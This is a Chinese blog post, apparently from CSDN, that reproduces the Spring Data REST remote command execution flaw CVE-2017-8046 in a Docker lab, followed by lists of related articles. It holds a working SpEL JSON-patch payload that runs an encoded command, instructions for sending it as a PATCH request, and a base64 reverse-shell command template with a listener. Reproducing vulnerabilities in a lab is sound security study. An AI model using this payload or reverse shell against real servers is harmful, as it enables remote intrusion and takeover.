Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)——漏洞复现

最新推荐文章于 2024-05-31 19:04:00 发布
最新推荐文章于 2024-05-31 19:04:00 发布
阅读量95 收藏
点赞数
分类专栏: 漏洞复现 文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42090431/article/details/134641861
版权
1、启动环境

docker-compose up -d

2、访问:http://你的IP:8080/customers/1

3、漏洞复现

3.1进制转换

漏洞验证之前,我们需要将要执行的命令进行Ascii转译,不然会执行不成功的.

将 touch /tmp/success 进行ASCII-字符 转换 

字符串转换为十进制,二进制和十六进制在线计算器,在线计算,在线计算器,计算器在线计算

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

3.2.验证漏洞
(1)访问 http://靶场ip:8080/customers/1 进行抓包

(2)转包之后将GET修改为PATCH

(3)添加字段 Content-Type: application/json-patch+json

(4)将制作好的payload添加到最后一行

bash -c {echo,你的编码}|{base64,-d}|{bash,-i}

[~]#棱角 ::Edge.Forum* (ywhack.com)

字符串转换为十进制,二进制和十六进制在线计算器,在线计算,在线计算器,计算器在线计算 (osgeo.cn)

新建txt文件 替换空格

监听 8888

反弹成功

4、关闭镜像

Sarahie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
在2022年,Spring Framework 发了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞(最详细版本)
精品博客,你值得一看~
09-17 658
REST API的Patch方法中(实RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与
一个有情怀的程序猿博客
06-30 1058
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越来越不受待见。 因此,我们有理由相信Spring引入SpEL必然增加安全风险。事实上,过去多个Spring CVE都与其..
spring远程命令执行漏洞CVE-2017-8046)
最新发布
2301_82197189的博客
05-31 232
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码。
Spring data rest漏洞在IDEA中CVE-2017-8046)
wxzyyds的博客
11-06 1215
这篇文章主要讲述了spring data restCVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA中的动态调试,实了对于漏洞产生原因的详细
漏洞 | CVE-2017-8046 Spring Data Rest 远程命令执行
weixin_42282189的博客
09-13 719
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响范围: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data r.
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞
weixin_45715461的博客
08-11 1024
本文只要是学习poc、exp的编写,对于漏洞的原理不进行深入的介绍。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
在2017年,它被发存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
vulhub中springCVE-2017-8046漏洞
yougexiaojiuguan的博客
11-29 331
学习过程中的记录,为了方便自己查看
CVE-2017-8046 与分析
weixin_30715523的博客
07-28 286
环境搭建 使用的项目为https://github.com/spring-guides/gs-accessing-data-rest.git里面的complete,直接用IDEA导入,并修改pom.xml中版本信息为漏洞版本。这里改为1.5.6。 之前尝试搭建了另一个验证环境,但是修改版本后加载一直报错,不知道是什么原因,写完在研究下。 直接运行,默认端口8080,访问http://lo...
CVE-2017-8046(Spring Data Rest RCE)
weixin_30763455的博客
04-10 213
环境搭建参考第一个链接,springboot启动文件如下,不同的启类,将Application.class修改一下就可以了,直接debug。注意:默认版本是2.0.3版本,修改成低版本,看一下mvn下载的jar包版本 漏洞利用: 第一次请求: 第二次请求: 注意的点: 需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点: 1、请...
CVE-2017-8046-Spring Data Rest RCE 漏洞
m0_58596609的博客
04-22 1124
CVE-2017-8046-Spring Data Rest RCE 漏洞
Spring Data Rest远程命令执行漏洞CVE-2017-8046)
wutiangui的博客
09-10 394
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码。将Content-Type指定为application/json-patch+json。使用python将准备执行的代码编码为十进制。访问以下链接,出如下界面说明存在漏洞。1.准备shell命令。修改方法改为PATCH。
Spring Data Rest-远程命令执行漏洞CVE-2017-8046)
qq_43381463的博客
04-11 453
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞
Spring Data Rest 远程命令执行漏洞CVE-2017-8046)
黑白的博客
12-20 1208
声明 好好学习,天天向上 漏洞描述 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 影响范围 pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3 pivotal Spring Boot < 2.0.0M4 pivotal Sprin

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值